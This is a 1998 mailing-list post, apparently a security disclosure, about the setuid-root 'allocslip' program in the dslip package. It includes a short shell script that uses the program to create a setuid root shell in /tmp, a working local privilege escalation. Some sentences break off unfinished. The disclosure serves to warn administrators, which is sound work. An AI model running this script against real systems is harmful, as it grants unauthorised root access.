dslip package

From: David Kopstain (tazat_private)
Date: Thu Jul 09 1998 - 01:34:20 PDT

  • Next message: Michal Zalewski: "Re: Linux kernel filesystem oddities"

            In the README file for the dslip package, it clearly states:
        Those people who are allowed to turn on and off SLIP lines should be
        put in the slip group.  NOBODY except user slip should be allowed in
        the slipown group since it effectively allows root access (since the
        dialin/dialout scripts must be run as root).
            The package advises to install the program 'allocslip' like so:
            -rwsr-x---   1 root     slipown      9220 Aug  4 11:15 allocslip*
            If you follow the instructions, then only users in group slipown
    can run this program and you're only at _their_ mercy. But if you allow
    anyone to run this program on your machine, and its setuid root like
    advised, then something as easy as this will compromise root.
    --- cut ---
    cat > /tmp/sg << EOF
    cp /bin/sh /tmp/tz
    chown root /tmp/tz
    chmod 4755 /tmp/tz
    chmod +x /tmp/sg
    allocslip /tmp/sg
    --- eof ---
            allocslip simply follows any command you give it as arg 1. So take
    the above shell script, run it, then look for your handy root shell at
            The buffer overflow previously mentioned is of no real concern
    then since we can already execute whatever we want. And the reason some
    people can't make this program do what exactly what they want, (ie call
    system_script() so they can execute whatever they want), is because they
    must have compiled in the slip option in the networking options of the
            Moral of the story: read the manual. dont be a dumbshit and
    install software without reading exactly what you're doing.

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